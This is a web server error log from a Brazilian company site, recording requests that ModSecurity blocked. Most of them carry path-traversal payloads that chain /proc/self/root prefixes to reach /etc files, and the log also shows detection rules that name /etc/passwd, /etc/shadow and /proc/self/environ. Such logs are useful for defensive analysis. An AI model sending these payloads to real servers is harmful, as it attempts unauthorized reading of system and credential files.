https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Fri Mar 20 11:04:35.406182 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.113:51302] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1T8vXLqtnMIWvjpaLDKgAAApA"]
[Fri Mar 20 11:04:36.091114 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.57:51390] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1T9PHIg5MgXLBnicMdcAAAAc0"]
[Fri Mar 20 11:04:36.942324 2026] [:error] [pid 10189:tid 140411658000128] [client 57.141.18.6:51320] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1T9DJ3M9BSuKP7CAZNPQAAAIo"]
[Fri Mar 20 11:04:36.957126 2026] [:error] [pid 10189:tid 140411691570944] [client 216.73.216.191:51406] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1T9DJ3M9BSuKP7CAZNPgAAAIY"]
[Fri Mar 20 11:04:38.630024 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:53820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1T9jJ3M9BSuKP7CAZNRAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:04:38.749558 2026] [:error] [pid 15826:tid 140411666392832] [client 216.73.216.191:51512] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1T9uoXxyEfFpUF8f-njAAAAUk"]
[Fri Mar 20 11:04:42.520086 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:37238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1T-vqxLDW4GITHUkQRMwAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:04:46.947291 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.35:51796] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1T_hCii7xarUs8iHaR0QAAAgs"]
[Fri Mar 20 11:04:55.410502 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.4:52194] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1UB_qxLDW4GITHUkQROQAAAQ0"]
[Fri Mar 20 11:05:02.916475 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:37250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UDhCii7xarUs8iHaR7gAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:05:08.308391 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.50:52550] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1UEeoXxyEfFpUF8f-nngAAAUM"]
[Fri Mar 20 11:05:10.074936 2026] [access_compat:error] [pid 26799:tid 140411683178240] [client 45.134.213.169:49739] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 11:05:11.936452 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.32:52740] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1UF_XLqtnMIWvjpaLDPQAAAos"]
[Fri Mar 20 11:05:19.493427 2026] [:error] [pid 11167:tid 140411649607424] [client 216.73.216.191:53150] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UH_HIg5MgXLBnicMdiwAAAcs"]
[Fri Mar 20 11:05:21.893830 2026] [:error] [pid 7893:tid 140411708356352] [client 216.73.216.191:53290] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UIRCii7xarUs8iHaSGAAAAgQ"]
[Fri Mar 20 11:05:26.214529 2026] [:error] [pid 11167:tid 140411641214720] [client 216.73.216.191:53538] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UJvHIg5MgXLBnicMdjwAAAcw"]
[Fri Mar 20 11:05:30.177217 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:60646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UKhCii7xarUs8iHaSJgAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:05:31.436413 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:53758] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1UK9a6ubjKNq_cu4YCMAAAA0w"]
[Fri Mar 20 11:05:40.526613 2026] [:error] [pid 11167:tid 140411590858496] [client 216.73.216.191:54198] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UM_HIg5MgXLBnicMdngAAAdI"]
[Fri Mar 20 11:05:42.687699 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.243.128:37250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UNhCii7xarUs8iHaSMwAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:05:43.447001 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.244.43:49788] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1UN7ninkcc-iUj5AqFCQAAA4Q"]
[Fri Mar 20 11:05:46.843361 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.241.31:38348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UOvHIg5MgXLBnicMdpgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:05:47.358780 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:52254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UO9a6ubjKNq_cu4YCQQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:05:48.217808 2026] [mime_magic:error] [pid 10189:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:43366] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/systemd/netif
[Fri Mar 20 11:05:52.059001 2026] [:error] [pid 26799:tid 140411658000128] [client 216.73.216.191:54822] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1UQNa6ubjKNq_cu4YCRwAAA0o"]
[Fri Mar 20 11:05:53.459442 2026] [:error] [pid 9818:tid 140411540502272] [client 216.73.216.191:54954] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UQV1pVZ5mVmJwsFNW-gAAAFg"]
[Fri Mar 20 11:06:01.414994 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.59:55322] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1USTJ3M9BSuKP7CAZNjgAAAJQ"]
[Fri Mar 20 11:06:06.000643 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.241.31:43382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1UTfHIg5MgXLBnicMdwwAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:06:09.447350 2026] [:error] [pid 11642:tid 140411733534464] [client 57.141.18.91:55752] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1UUbninkcc-iUj5AqFIAAAA4E"]
